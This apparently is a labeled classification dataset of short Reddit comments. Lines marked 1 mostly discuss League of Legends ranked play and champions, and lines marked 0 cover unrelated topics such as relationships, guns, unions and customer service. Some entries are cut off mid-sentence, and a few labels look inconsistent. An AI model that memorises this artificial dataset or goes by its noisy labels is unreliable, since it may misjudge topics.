1	From Bronze to Diamond I have never seen much focus on team composition. The only attention I see spent on it is usually, "We're too squishy" or "Shit, we have no damage". If everyone played like you (several champions for their role), the game would be veeeeerry different, in my opinion.   Yes, it happens less as you raise in elo, but it never goes away. I'm afraid my solution(s) were as follows, and only the third one may apply to you, as an ADC player:     I mained Teemo top. Teemo has strengths that fit into any composition (map control, secondary ranged attacker, blind the auto attacker) but without SOME KIND of CC is incredibly vulnerable to divers. I had the choice of learning other top roles or just getting used to adjusting how I play every single game depending on our composition. Since I was often winning my lane, and translating that lead, I decided to choose the latter, and stick with the little guy. The pros outweighed the cons. I'm not saying "play Teemo", I'm saying stick with what you're mastering and learn how to adapt to a variety of team compositions.     Switch to a champion that fits any composition that you TYPICALLY see in your elo. Rammus and Maokai fit almost any composition in P2-D5 for me, because tanks aren't nearly as popular as damage dealers and I can always be useful.     Talk to your team about their strengths and weaknesses. About a month ago I played on a team with all hyper mobile assassins. No durability, no CC. I reminded them at the beginning of the game that our strengths would be to separate the enemies by split pushing, and pick them off in the jungle, or any position we could lure them in that would be unfavorable. And perhaps most importantly, DON'T GROUP AND SEIGE. That would be our doom. It happened to work. The entire team played like a bunch of slippery fish, never grouping until we had picked them off, and wittling them down until they surrendered.
0	I completely understand your viewpoint and I agree that having good movie watching etiquette makes the experience better for everyone. What I'm specifically responding to is the way you expressed your point when you said   >get a girlfriend who's more mature than an 8 year old.   and   >most of the guys in this thread look like they're dating children.   The point I was making when I responded initially is that while everyone in this thread is complaining about their partner's movie watching etiquette, they're still with that person so it's obviously not a dealbreaker for them. Everyone has a few obnoxious behaviors, and so will whoever you end up with. It doesn't necessarily mean that they're less mature than an eight year old or that they act like children all the time.   Further, I think everyone is just venting in this thread and that it's not as drastic as having to find someone completely new. I think the real immature action here is having these problems and not voicing them to your partner if they bother you so much. Anyone will tell you, communication is the most important thing in a relationship, and if you don't tell your partner when they're stepping on your feet then they probably aren't going to just magically know.
1	Stop whining, if I were to be placed in bronze I would escape it in a few days, same for ANY gold player. You are where you belong and you won't climb before you get good, it's simple as that.   The LP system isn't perfect, but it's ok. I'm now sitting at 10 LP in g2, I used to have 72. Should I cry about it? No. The thing is I know that I have 56% winrate after 163 games therefore I will inevitably climb, simple as that. There will be a point where I'm going to get 50%, and it will mean I reached my peak and so on.
0	Aww. Look how emotional the little liberal is that he feels the need to down vote my comments. How cute.   >Firstly just because criminals are able to get something doesn't mean you're letting them.  It's not like you're making a law with a clause "except for criminals."   You can't stop them.   >Secondly, you seem to be unaware of all the "law abiding citizens" who buy guns, and then who end up shooting someone, thus becoming a criminal.   You make it sound like the guns bought legally are the problem. You have no idea how small the percentage is of all legally purchased guns that are used to kill people.  Most people who own guns legally never use them to harm others.   >Finally, you seem to be implying that ordinary people owning guns somehow stops criminals from doing anything bad with them.  It doesn't.   Actually, it does. Remember that ordinary gun owners aren't killing anyone. Also remember that they have the legal right to own guns. You lose here on every point.   >So I'll rewrite your statement thusly: "Lets restrict people from buying guns so that only those who are willing to buy from black market sources have guns."   Sounds like a great idea. Lets round up all legally owned guns and rob citizens of their rights. This way only the bad guys have guns.   >Still not great, but certainly much better than the current situation of:   >"Lets just let everyone have all the guns they want, for any bullshit reason."   What's wrong with that?  Did you know that owning a gun hurts no one?  I could own 1,000 guns and that would have no effect on anyone else. Remember, I have the right to bear arms. The people who use guns harm others are already illegally purchasing their guns.
1	Heres your problem: Youre focusing way too much on the ladder, LP, divisions and promotions.   I was stuck in silver 4 for over SEVEN HUNDRED (700) games. All i cared about was desperately hitting gold. After i hit the 700 mark, i decided to just give up and accept the fact that id never be gold. I just started playing to get better and learn more.   I shot up to silver 1 in about a week. Im currently silver 2 again after some annoying internet issues causing me to lose some games, but im confident i can get back in.
0	Over half a decade of talking to an internet friend, we degenerated into only ever using ;P and ;p. This, in turn, made our conversations become more and more hostile over the years as it seemed we were always having a go at each other. One day I just said, hey, we have a problem. It was like a dating talk but with a guy. Since that day we haven't used those emoticons.. hang on, I just realised text smilies aren't really emoticons but yeah whatever, we're here now. Yeah, we only use the non-winky versions, i.e. :P :p, and things have never been better.
0	whaaat? My 81 year old grandma and 78 year old grandpa live happily and independently and travel around the world, go on long bike trips (this summer they biked in Alaska and have now officially biked in every state), are extremely active in their community, and visit their children and grandchildren. They are some of the happiest, friendliest, most amazing people I know.
0	can we have the
1	If your ult is 100% going to save your mid and without it would guarantee a kill to an enemy why are you even asking this question? Of course use it, how do you know you can use your ult to get a kill top?   It's a morale thing too, you save your mid from certain death, gives a confidence boost to your team while denying that confidence boost to the enemy. You're making your global presence felt etc etc. And it's not like you only get one ult per game, the shit doesn't take long to cooldown.
0	Oh man, just last night I ran into a similar situation. I block all my exgfs on facebook just for sanity. Last night one of my first gfs had a friend like one of her instagram photos, so it popped up in my feed. Just curious about what she's up to I searched the handle attached to her account. I found her instagram, but also a ton of sex sites using her profile/name/pcitures etc. There were several (I know she tried some creepy sugar daddy shit once.. but not so much on this level) I contacted her and she hadn't even heard of some of these sites. What did she expect from the type of people on these sites?
0	In the 11th grade (two years before you can apply for college) i had this Geometry teacher who was really bad (she was the daughter of one of my school's secretaries) and she hated me. She just didn't like me. So, here in Portugal we are evaluated from 0 to 20 and in Geometry we have to take 2 exams for each semester and the average from those two exams will be 85% of your final mark. So i took the two exams, 18,7 and 19,8. She gave me a 14 in the end.   Here in Portugal you have the option to cancel your school mark and take an exam made by the Government and whatever your final mark is, that's what goes into your average when applying to college. So, in the end of 11th grade i asked my teacher if i she thought i should cancel her final mark. She said "No, you aren't good enough, you won't make it." Anyways, everyone has to take that exam, if you do not cancel, 35% of the exam's final mark averages with your teacher's final mark. So, i did not cancel, i'll explain why later.   A few weeks later the whole school takes the exam (we we're about 60 students in total), and i get an 18,3. The second best mark of all school and the best of my class. And my colleagues who were given 18's, 19's and 20's by her, they either got a negative (D,E or F) or a C (from 9,5 to 13,4).   I could've had a much better average to apply for college if i'd previously cancelled my school evaluation. The reason i didn't was that, the course that i wanted to apply for (Electronic Engineering in IST) was already guaranteed by my current average at the time, so there was no need to go through all the papers to cancel that out. I figured that, if all the people saw the final marks hanging on my school's hallway (the exam mark was back-to-back with the teachers mark, side-by-side, this caused for a greater effect), they would notice how bad as a professional she was (plus, everyone knew my story and my tests marks we're registered in my school's record).   I could've easily take my teacher to court and win, and i probably would if my final average wasn't enough for the college i was applying for. But meh, now everyone knows how shitty she is.
1	With Cait specifically, I think you should take advantage of her range in lane with tons of harass.  You can really zone + dominate the laning phase  (assuming you are playing smart and not overextending without vision).   Maybe vs an aggressive ganking champion, passive play could be the way to go.
0	A similar instance happened to me.   I was about to do research in class for a project on the BP oil spill, and I went on Reddit to see what was good at 8:30 in the morning. The first link was to an article about how the oil spill still affected people to this day, along with some decent information about the issues BP was having with the corexit compound.
1	I like to stay out of the cluster fuckage (I lose track of my character ffff) but still want be useful and do damage. I play rather defensively but have found myself thoroughly enjoying faster-paced champs and have been working towards being more ballsy.   I've never tried a melee character (been playing for 2 weeks). I am currently trying Ashe and enjoy her FUCKYOU arrow. I find characters that are slower paced boring (slow movement, slow attacks, long CDs..)   I have already tried: Morgana, Kayle, Twisted Fate (briefly), and Tristana. I have my eye on Annie, Orianna, Vayne, Amumu (try something new), Lux, Akali, Anivia, and Fiddlesticks.
1	I'm sure no one cares but I started playing during the end of the summer split and with classes and such I JUST got ranked last night. (Silver 3 yay!!) but anyway! I had people trolling all the time. Everyone picks their position and is really civil about it. The last pick comes up and says I'm going adc. And while we tried telling him it was taken, he says "oh well idc" so the adc decides to switch to support. The guy picks Leblanc adc. Gets DESTROYED in lane. Refuses to farm and just sits in lane. His support gets mad because, bless his heart, he's trying so hard. Because he's one win away from Possibly being placed in silver. I'm in the mid land and kept trying to gank but I was playing a solid lane opponent so couldn't  sacrifice the farm too much. Leblanc ends up leaving, which causes our Zac to rage. He keeps trying to surrender and my 2 remaining teammates and I say no! I'm under the impression that surrendering loses you more points? Anyway. Then the next 3/4 games in my provisional games, our support leaves, our carry has a bad connection, and our top rage quits after getting ganked 2 and refusing to ward. So I played 3. 4 v 5s. How we won 2 of them is beyond me.
1	I, for one, downvoted you because i think the use of terms like 'fucking pathetic' is more aimed at insulting ppl than at actually contributing to the discussion by pointing out your thoughts.
1	It's true that Quinn feels incomplete and somewhat bland both design-wise and thematically, however that wouldn't have been that much of a problem if it weren't for the skillset.   There's this one thing I absolutely don't get about the feel they were going for - it's as if they wanted to make her one of those close ranged, in-your-face ad carries, but were too afraid to give her any real strenghts in return for the range, while successfully giving her enemies craploads of counterplay to her.   Her ultimate is basically a somewhat stronger (stat-wise) Sivir ultimate. Except, you know, one that makes her melee AND is not an aura. Her gap closer seems to be designed around being "counterable" - you throw your cc at her and bam, she's in melee range waiting for you to crap on her. If anything, I feel like making her untargetable/invulnerable during the animation would not hurt any aspect of the game at all.
0	Have an upvote for your
1	yep. can concur. just had that happen. played support where an ashe who couldn't last hit for the life of him was part of a 3 man. needless to say, it was all my fault that the lane lost and he was down 50cs.   but then again, when my group of guys play norms, we do it for funsies. we usually end up getting the 5th man to join us on the next few games / add them to our skype call.   so
0	Here is an example that I brought up when the supreme court was ruling if police needed a search warrant to place GPS tracking devices on suspects cars.  The suspect was assumed to be moving drugs but they had no hard evidence, or not enough to get a warrant.  A cop bugged his car and they tracked his movements until they have enough evidence on where he went and when, and cops were able to catch him trafficking drugs.  The supreme court ruled that you cannot bug someone's car with just officer suspicion, you need a warrant.   The person I was talking to said that if you have nothing to hide, why bother if they track you.  I responded with, "if a cop assumed you broke the law by speeding sometimes and bugged your car, waited 2 months to build a good case and not blow his cover, and after 2 months, presented you with a ticket for each time you exceeded the speed limit, failed to come to a complete stop at at a stop sign, or failed to use a blinker,  would you feel that his actions were legal?"
1	Ok first off I'm not offended. I am an atheist. I don't know what your profession is but I work in a public relations office. This would be offensive for any corporation to do. Regardless of the facts of where or how something began that you have to give, it is still irrelevant. What it stands for now is a mockery of a religious figure, most commonly the God of the Bible.
1	I haven't been doing much at work today.  There's two (funny?) stories, and rhetoric.  Just read the last bits if you want a summary before the
1	Not only during dead time. Without those Casters (and I mean THE Casters) matches wouldn't be as enjoyable.   Starting with their "homely" humour. They toss jokes around like they gathered for some friendly watching and whisky. They also use a lot of reddit/"mainstream" jokes about teams/players (like "60 minut EG games"). Today's "best" atm would be "a little Cyanide and his baby face" made by Deman but Joe Miller's high pitched voice is there, too.   Next, they ask good questions and let players to be "man of a show". It is a prop to not only Casters but also players.   Long story short (
0	I can't actually vouch for this, I called up a company, asked for something (An upgrade on my monthly plan with them, but, I was offered 50% off for the first six months of a 12 month contract), they said "Sorry, we can't do that", even though someone else told me they could from the same company literally a week ago (They said they were having problems with my account at the time and couldn't upgrade me then, but, to call back next week). After being put on hold for almost twenty minutes, they finally came back and said "Absolutely. 100% we can't do it, sorry, I just spoke to my manager", at which point I said "Can you read the notes from around $(date) on my account? He told me he wrote it on my account notes", and, the guy read my notes allowed to me, after about five minutes of reading, he finally came to a note that said "I've promised the customer $theThing" and the guy suddenly springs up "Oh, he promised you that? Well then, we'll honor it.", and, I was all happy then and was like "Great, I'll have it", but, he then says "But there's a start up fee of $50", to which I replied I had never been told this before and he said he absolutely can't waive that.   This point, it was about an hour of me on the phone, I was getting pretty pissed off, and, this was just for an upgrade of my account. I tried not to let my anger show, and, simply asked to be transferred to cancellations because I've honestly had enough of this and I'll just use a different company to provide the same service to me, one that preferably doesn't promise stuff, but, leaves out hidden fees after it's taken a week of my time (~ an hour each day on the phone). He said sure, and, transferred me. Cancellations didn't even try to keep me as a customer, the woman I was talking to said that the offer the last guy offered me (On the  SAME ) call couldn't be done, and, he had no idea what he was talking about, after she gave me some shit about how they can't offer any discount, and, I was free to leave their company at will (After being a paying customer every month for over six years), I finally said I going to consider it over the next few days and get back to them, but, at the same time, I wanted to be transferred to their technical department because I was having an issue with my account (Unrelated the upgrade). They transferred me, and, the tech asked if I was having an okay time with their support (They always ask this on a transfer), I told them "Basically you guys are liars, but, that isn't your fault, nor your department", and, the guy said "Explain more", I explained the entire thing (Not giving me a discount they promised, including startup fees they never told me about, etc...) and the guy literally said "Oh, no issue, I can set that up all for you right now with no setup fees and including that discount offer you were promised", and, within five minutes of talking to him I had ordered it, was off the phone, and, relatively happy with his service.   His co-workers though, fucking asswipes. Him? Pretty nice dude.
1	Umm its honestly more of a personal preference, but I like Nocturne because he is easier to gank with. Since you have a Lux, if she lands a snare you can make them stay if your e longer and fear them, and for rumble if he slows and you fear he can land his ult and they will stay in it for longer
0	Can confirm, my dad has been a verbally, and emotionally abusive alcoholic since I was born. It got to a point where I just gave up trying to help him, realized he was a cancer in my life and needed to be cut out. I'm 24 now, dealing with severe depression, taking medication and going to therapy. I'm learning that despite on the surface none of that shit he's done bugs me anymore, it has fucked up my emotional development. I was the oldest of 4 and because of that anytime something got too out of hand it was up to me to distract my siblings and keep them away from it all. I had to grow up too early, and not having any emotional support for as long as I did just fucked me up even more. Doing better now, but I have a long road ahead of me before I can feel any sort of "normal" again. I never really realized how much of an impact a childhood like that can have impacted this deeply on someones psyche.
0	whoa. I actually had that on my list but i was reorganizing and I think I accidentally deleted it. I had to do a double take, thinking it had still been in my post!   So yeah, +1 to that. The second one is the best one. And don't
0	Kind of the opposite happened to my wife and I, but I think the same idea applies. We were shopping for new carpet for our condo, and we got three quotes. We went with the lowest quote, which happened to be from a local business (~$1600).   One of the other companies we got a quote from took a deposit when the person came out to measure our rooms, but they said it would be easy to get the deposit back if we decided not to go with them (they quoted us ~$1800). When we called to cancel, we got transferred to the guy whose job is it to try to get us to not cancel. He claimed they had an overstock of the carpet, and he reduced the price by $400, making it the new lowest bid.   We opted to go with the local place anyhow. Surely the more expensive company knew they could go down to $1400 even when they came out to measure. The fact that they were trying to rip us off for an extra $400 is frustrating.
1	well on veigar its not really needed how much u have on your q, its good for the enemy for nasus to be able to guess how much dmg a q from him will do(ofc not the exact dmg because of armor etc.)  but for veigar and sion(the other stacking champs) its not needed cause if u click on them u have enough information(u see veigars ap and sions hp) so no need for a "bufficon" that shows how much ap/hp theese champs got directly from their skills.  only on nasus is it important for counterplay cause else you cannot calculate what dmg his q does just because u see he has a good or bad farm, does not mean he will have a lot or not many stacks on his q.
0	serve you something that doesn't reflect their art/skills   'Fuck what you want, I'm an artist!'?   That is ridiculous.  I have a colleague who is the CEO of a billion dollar a year company.  Like me, he has issues with textures.   Rare steak makes him throw up.   An oh so clever chef pulled the 'You ordered medium well, so I'll deliver completely rare' thing.  A table of 20 people, who ended up spending about $7,000, ended up at a different restaurant.
1	I think people put way too much stock in events having to be televised for them to be "legitimate" sports. It's a sport, I won't watch it on TV because while my parents watch stuff on TV, most people in their 20's now consume way more media with streaming and online tech, ESPN doesn't have my viewership because they don't offer any good services for me. Granted I have seen some of their channels do "free" (If you login to your comcast / Time warner / whatever cable provider account) streaming of some of their events. However I don't really feel a need to suck up to ESPN, as if they define what sports are. They are a cable network, all of their channels simultanious viewerships combined probably don't beat the number of viewers at (most) times on twitch. Let alone all the other global gaming stream services (which there are a lot of) China's LoL streams / Korean streams / Japanese streams are all on different websites.   If you were to add up and compare all gaming streaming on sites like those (including twitch) and compare it to ESPN, ESPN's viewership would be beyond crushed.
0	Because they protect people that don't deserve to be protected. You could be the shittiest worker and cost a company a ton of money because they can't fire you. Depending on the job you are generally forced to join the union, which includes union dues which is your money.   Workers may go on strike to force raises or better benefits. Sounds great if you're a worker, but could potentially destroy a company. You maybe being a bottom of the barrel employee think that's great, but the people who worked hard to build this company from the ground up to make it where you even have a job at all get fucked over. Not every "suit" is a piece of shit looking to screw you over.   Unions use your dues money to pay union bosses big bonuses and fund political agendas you may or may not agree with. They're doing that with your money.
0	Actually, the post says "took a feminist to prom." We can't actually infer from that information the gender of who was going. Could be a guy and a girl, a girl and a girl, or a guy and a guy.
1	If your good enough youll carry out, I madea thread a while back called Plat 1: the real elo hell.  I was in your boots till i manned up , faced the fact that I had to get better, then improved and finally won.
0	IIRC, historically, BOSE equipment has been sub-par.  I've never had the chance to test out their stuff myself (broke college student, you know the drill), but as an amateur audiophile, I have read in many forum posts about how terrible BOSE speakers are compared to other brands.  I'm sure the hate for BOSE is slightly over-hyped, but if it hadn't been an issue in the first place, it wouldn't be so common.
0	This is more important than living with for sure. You can live with friends sometimes and have it be positive. Obviously some aren't and you learn and move on.   MONEY and friendship is a bad recipe. Be it a loan, a group purchase, or a business. I've lost friends out right and lost depth to other relationships because of money.   One of my best friends that I've known for 20 something years dug himself a hole and needed to borrow 4300 dollars. I had it so I loaned it ..he was my buddy. We hung out almost daily. Had lived together.   I was flush at that time amd told him just make monthly payments. If you're sitting good make a bigger pay,ect if not..hell give me 50 bucks. I should have known almost immediately as he missed paying at all the first three months but he said I'm just finishing off my debt that you helped with and once I'm ahead I'm paying. After three months he did start paying. It was almost always 20 dollars. No huge deal I thought because hey he is making payments and I don't need the money.   Times goes on and he gets a new gf and moves to a city 20 mins away and I'm very busy running a 14000 watt three room marijuana grow house amd working about 50 hours a week as well. My life is busy and I don't notice at first that friend hasn't paid me in a few months. Don't see him as often as well. Catch up with him at the casino (I know right wtf is he doing at casino when he too broke to pay his own bills?) mention it and he pays me I believe 200 dollars that night. He was winning.   Fast forward 2 years or so (yes that long) and I've been robbed by some people of well let's say a lot of money ( can't put large amounts of cash in bank they report to IRS at any more than 9999.00) about 20 lbs of marijuana and stupidly of me ...my savings/profit.   Well when they robbed me they cut a hole in the wall of the house I was growing in and left a trail of marijuana debris all the way to the street. Police got involved (pre marijuana legalization) and even though I had used pseudonyms for bills and such I'm connected......you can't run a growing operation that big and let the power company see how use you have...it's massive and obvious....so the power was being stolen (yes my fault yes it was wrong).   So I'm neck deep deep in lawyer bills and fines as well as owing the power company a lot of money. Luckily I had an annuity account from my father passing that I cashed and paid for lawyer and most stuff involved with case and had some money hidden at my moms house. However I had to pay the power company monthly installments and I had a 700 dollar a month car payment...along with everything else.   Life isn't awesome anymore. I don't even have my annuity payments coming in...luckily I kept my job. So lucky there. I'm struggling though. Moved to a small cabin by the puget sound to reduce my bills and am kinda scraping by.   Ask my buddy hey man you still owe me money (like 3500 still) that would really help man...payments or a chunk of cash. This dude was skiing and partying wearing new shoes ect ect ect. Tells me times are tough man I'll try...I think he paid me another 1200 during a six month period. Then payments stopped again and he never came around. New diff gf new town.   Well my luck turned to shit and stayed that way. A year later my house burns down. I lost literally everything but the clothes on my back. Buddy is still living it up whenever I see him or hear about what he is up to. Dude doesn't even call me to say hey man I'm sorry your house burnt. People at work were giving me coats and shoes ect trying to help. People I didn't know (workmates friends) were helping me. Buddy didn't even offer me socks...or payment.   I went the fuck off on him one day. We never talk at all. He still owes me over 2k and sometimes I day dream about burning his truck.   I'm doing fine now. I lost a friend of two decades over money.   Sorry for extremely long post.
0	As someone in food service, I agree 110%. As much as it is our job to provide good service, there is a point where there needs to be mutual respect going on. We provide good service because you respect us, and you respect us because we provide good service. Tips are NOT an obligation. Tips are a reward. A reward that I believe most servers deserve. I usually don't tip much during slow hours because I know for a fact that the workload during that time of day is low. I tip around 15% then. But during weekend night hours when the restaurants are packed, you can be damn sure I don't go a cent below 20% even if the service was regulation. 95% of the servers where I work deserve the tips they make because they genuinely try to give the best service. And while I can't deny that there are some people who abuse the "tips are obligated" stigma, the majority are hard working individuals that make more money based on the service they provide.
0	It something that you risk, but is healthier for you, him, and if it survives, the friendship.   You know I'm sure I don't have to tell you that you are in no way obligated to date him if you don't  want to. To suggest otherwise would be insane.   Something I think gets lost in the conversation is that no matter how you do it, whether it by letting him down soft (and us guys aren't much for subtlety, so he might not get it, making this mostly a bad option), or by being honest and blunt, you are rejecting him. You are saying that he is fine / good / great as a friend, but that he is lacking as a romantic / sexual partner. He isn't good enough for you, for whatever reason.   Now let me make something clear: That's fine. Like I said, you are not obligated to date anyone you don't want to. But your rejection is going to hurt him. AND him staying friends with you may hurt him psychologically, as you may remind him of that rejection. So let me make something else clear, as much as you aren't obligated to date him, he is not obligated to stay your friend afterwards. You are not entitled to his friendship. Not sticking around doesn't make him weak or immature, it just makes him human.
1	Your LP gains and losses in ranked are determined by your MMR compared to what MMR is expected for someone in your tier/division.   EFT = Expected MMR for your tier/division   MMR < EFT --> LP gains < LP losses. The system thinks you should be in a lower division/tier.   MMR = EFT --> LP gains ~= LP losses. The system thinks you are roughly where you belong.   MMR > EFT --> LP gains > LP losses. The system thinks you should be in a higher division/tier.   Furthermore, in division 1 of any tier LP gains/losses are also affected by clamping. Clamping stunts your LP gains/losses. Clamping gets more severe the closer you get to your promotion. It is possible to gain +0 LP for a win if you are at ~99 LP and your MMR is insufficient for the next tier. For more information on clamping please read [this]( post.   Additionally, your LP gains and losses are also affected by the average MMR of your team compared to the average MMR of the enemy team.   For more information about the league system read the [Season 3 FAQ](   For more information about MMR read [this](
0	I'm not from NASA, but I am studying astronomy. So, I'm going to explain why Pluto isn't a planet. Please save all angry PMs for after the presentation.   Basically, we had Pluto for a long time. Tiny little ice rock out at the edge of our solar system, and it had Charon, and that was it.   In about 2005 (I think?) we suddenly discovered that Pluto had like 4 or 5 more moons. And then we started discovering other objects that were just as big as pluto or bigger, and they didn't have orbits like the rest of the planets, either. Pluto is smaller than some of the unnamed asteroid/iceballs out in the Kuiper Belt (all the left over crap in our solar system that was too tiny to form into fully realized planets). So, we had to decide: are all of these things planets, or is Pluto something else?   So, if Pluto is a planet, then we'd have to make all these other tiny iceballs out in the outskirts into planets, too, and we're finding more and more of them every day just because we've got better viewing equipment and we know what to look for now. It's seriously pretty difficult to see them, so we've only just recently started spotting them. It's hard enough to see stars far off, and those things are crazy bright. Do you know how hard it is to spot a dark little ball of ice and dirt without any light source lighting it up from behind? It's kind of amazing that we spotted Pluto as early as we did.
0	I am a mother of a 3 year old. By no means can I speak for this woman, or her child...but I like to think of myself as a good mother.   Sure I have had the accidental, say-too-much-in-front-of-your-child scenario, where I curse, or argue with his dad...but it is nothing more than I experienced as a kid, and we always try to rectify it with apologizing, or showing him we're fine, and it was just a misunderstanding.   So my son, being 3 has been kicked out of daycare already, and is now a stay at home with dad. His behavior is HORRIBLE. He is known as the kid who "hits and kicks". Sometimes he just screams, no warning, not out of sadness or anger...he just has SO much energy. We have done PPP, followed all of their instruction, still a butthead. Lately, the only thing that is getting through, to my dismay, is spanking. I say "You can stop now, or you get a red butt" ...usually works, but sometimes, I actually have to give him a red butt.   I also like to note, hes always been like this, but the physical stuff didnt really sink in until he was in daycare long enough for other kids to hit him...before that he never hit, just rambunctious.   Now, if he acts like that in public, I wouldn't just stand there, I would tell him its time to go home, and make him go to his room.   My point is, you cant judge every mother for the way her children behave. Its not always the case, but for those of us who DO try, it makes us feel like the biggest assholes on the planet.
1	What is your Elo?   1947 on one account and 1920 on another   > How did you play to get to 1900? Did you play a single champion over and over again, like Dyrus and Hotshot, or did you play a few champions, or did you play whatever you felt like? If so, which champion was it? Did you just play a single role, but a variety of champions in that role? If so, which role did you play, and which champions were your best?   I, like you, am a Jack of all trades player. I play everything and tell my teammates to pick their best and fill me in if i'm a later pick; and only pick solos if I can pick something very safe. I do generally pick heros that I know don't have hard counters but some are exceptions.   Champions:   Janna   Lee Sin   Corki   Morgana   Ryze   Kennen   Riven   Cassiopeia   > How many games did it take you to get from 1500 to 1900? 100? 200? 500? How many more to get to where you are right now? (Or where you feel is where you should be, I know that high elo is very volatile)   I didn't jump straight into ranked, I played normals until I had about ~400 wins. I jumped straight to 1400s when I first started, increasing about 100 every 2 weeks until I hit the 1700s. I was in the 1700s range for about 1-2 months and the 1800s for about 3 weeks. I think I could have done it faster but solo queueing at the 1700-1800 range is miserable, troll filled, and generally frustrating. I've played about ~1000 games across the two accounts.   I am pretty satisfied for where I am in terms of elo, I'd like to hit 2000 but I don't really play enough solo queue on my own (prefer to duo queue with friends that are lower elo/on different accounts as playing by yourself gets old)   > What role do you think is the best for getting better at the game. For example, support might be the hardest role to carry with, but could the focus from last hitting on the rest of the game help you learn it faster?   Support is  vastly  underrated in terms of gaining elo. I kind of disagree with the circlejerk when it comes to this for a few reasons. I'd say it's the best for improving generally at the game's awareness/teamplay components. I'd say jungling is a close 2nd.     There are A LOT less support mains at low elo. Usually players are forced into it and are generally unpleasant in their gameplay and their demeanor.     Supports hardly ever get banned out unless for their jungling aspects, besides that few week stint of Janna bans it's a relatively safe position.     You can easily make calls as a support player, and the ability to pay attention to the map and know where to ward helps your general awareness with other roles as well.     Bot lane gaining an advantage, if it's significant enough, can win the entire game from lane phase. AD carries getting items too early just spells disaster for the other team as their bruisers will start to fall off earlier than your teams'.       For mechanics I'd say that midlane actually teaches you the most as it's the most "skilled" (imo) position as it's all about landing combos, roaming properly, and utilizing your champion's kit during the midgame.
1	Zyra is a pretty strong Jungler, and she with red buff and she long range auto attack can easily slow ur opponent and easier to hit the grasping roots. Zyra can jungle without losing health thank to her plants after lv2. She is also very easy to carry games because people won't expect that much damage from a "support" Jungler. She can 1 shot ADC or APC pretty easily.
1	You see, I love playing support. I have a retarded high win percentage in both normals and ranked by carrying the bottom lane with Sona harass. Still, a lot of games are lost because there are pants-on-head retarded people who can't play a fucking solo lane. Obviously, a solo lane will have a high impact on the game. If you can't CS and/or feed your lane you shouldn't be given a solo lane. On the other hand, if you declare what role or lane you play at the beginning of champ select then this game isn't for you. You pick when it's your turn and you will have to pick something that suits your team and not what you want to play.
0	I deleted myself from okcupid, because I couldn't deal with the hypocrisy that it was.   "RATE ME AT 5 STARS!!"   I don't like dating sites, but I know that's all there is.For the most part. I know I had a real shitty life, but its kinda of getting better.
1	Anyone who tells you you shouldn't play ranked if you don't know all the roles is lying to you. Roles barely even matter until you get into high silver and gold. As long as you can play a champ that remotely fits into whatever you're trying to do, you can play it just fine.   For example, my ADC is probably at a Bronze V level, but I can still make gold because I'll pick any random character I'm good at instead of trying to force an AD carry that I can't play.
0	I never tell people how they should have gotten there tattoos but I've had a friend who got a tattoo that was in Spanish that was supposed to say "I love my girlfriend" but instead of "novia" which is girlfriend in Spanish it said "novio" I told him his mistake and felt pretty bad about it, he ended up going back and getting the o to look more like an a.
0	who gives a shit. Son. Take a seat. Let me describe something to you. I am married and about to have my first child with the woman I love but hands down, best sex I ever had was with a nasty hippy with hair everywhere.
1	Generally, giving ETAs does a lot of bad things for everyone involved. Think about these scenarios:   1) Riot promises something by date X, and can't deliver for whatever reason   -- Now the community is mad at us, and other Rioters who are working on this are mad at the person for making the call in the first place (without their approval and/or knowledge). Everyone is mad for a just reason. Not cool! - for anyone involved!   2) Riot doesn't promise something, and we don't even bother guessing.   -- Reasonably speaking, nobody would be having any kind of expectation, so when it comes out, yay, everybody's happy!     Everyone involved on working on it is safe to work at the pace they are able to, to allow them to deliver an awesome product down the line, with the best possible player value achieved.
0	If she doesn't say 'yes', there is obviously a reason.   Which could be one of many possible explanations.   One of which is that fear I know people all too well, and I will be at the center of a conversation analyzing my inability to read into social interactions or leagues for that matter. Or quite possibly even something really stupid and trivial.   And so the chain of gossip continues among women, and my reputation continues to proceed me, I guess this is my natural selection when it comes to dating.  If any woman is  desperate enough  smart enough to see through the social conjecture. Aaah who am I kidding, I am not attractive or outgoing enough for that. My only avenue is potentially through the friend zone, every man has at least some sort of sense of humour, and women generally respond well with people that make the comfortable and happy.   Why can't girls ask men out, it's not like we have made a decision beyond weather we'd  fuck   make sweet love to  you or not anyway. Besides if I made up my mind that fast you'd just fuck around with my narrow minded attention anyway. So how about you all just realize it's easier to engage men first, without formalizing relationships upon its beginnings. Friend zone the fuck out of us, and force us to understand what you are about. Because I am sure as hell not going to learn from my small relationship sample size. Also the ones I have had are varying samples, which is probably good for my cause. I still don't know what the fuck I am doing though.
1	Helping with 5. since you asked What instead of When --  You buy according to what your champ needs. For example, I play a ton of Malzahar, which means my first big item is usually one of three different items (Zhoynas, Rod of Ages, or Morellonomicon) and I determine which item I should go for depending on the enemy composition and my performance early game.  If I'm against an AP burster like Leblanc -- I'm going for Rod of Ages because it gives me health and mana to survive against her all-ins while still being able to pump out some DPS. It's also a great scaling item for mid-late game.  If I'm against an AD burster like Zed, Jayce, or Talon -- I'm going for Zhonyas because the Armor and active are perfect for taking as little damage as possible when they're trying to put down some poke, while also being able to virtually negate their all-ins.  Against almost anyone else (especially sustain mids like Swain or Vlad) -- I'm rushing the Morellonomicon for the mana regen, and healing debuff for mid game objective fights (whether it be sieging an outer turret or a Dragon Fight, the healing debuff is excellent for countering Healing effects during crucial mid game fights).
1	Despite the other comments in this thread, boosting is only defined as playing on an account that is  not your own  with the intent of gaining ELO (moving up the ranked system). Here's two situations, one is boosting, one is not.   1) Player A and Player B want to play together in ranked. Player A is currently Silver and Player B is Platinum. Player B decides to log onto his own (Player B's) smurf account that is also Silver to play with Player A. This is an example of duo queuing with one person being a smurf. Perfectly okay   2) Player A (Silver) wants Player B (Platinum) to log onto his (Player A's) account and play the ranked games for him. This violates the rules of Account Sharing and is considered Boosting. This is not okay.
1	I had something similar happen when I was J4 with a Malphite on my team in Aram. We ulted across each others path at exactly the same time in an "X" shape. Malphite's ult completed, but it just stopped me mid ult, no stone arena...no movement...full cooldown.
1	The fun thing which way you did not carry ?   Your team got inhib and 1 inhi tower. But other point is throws, hard throws like really when you need to group and team you wonder solo, too many dying to them on pointless basis (cass vs vayne and cass got full ult on you :D).   The point is: your got kills and carried till mid game but later on your team and you thrown the game.   What can be done: learn to get objectives (man really baron at ~26 and not real objectives by team got ).
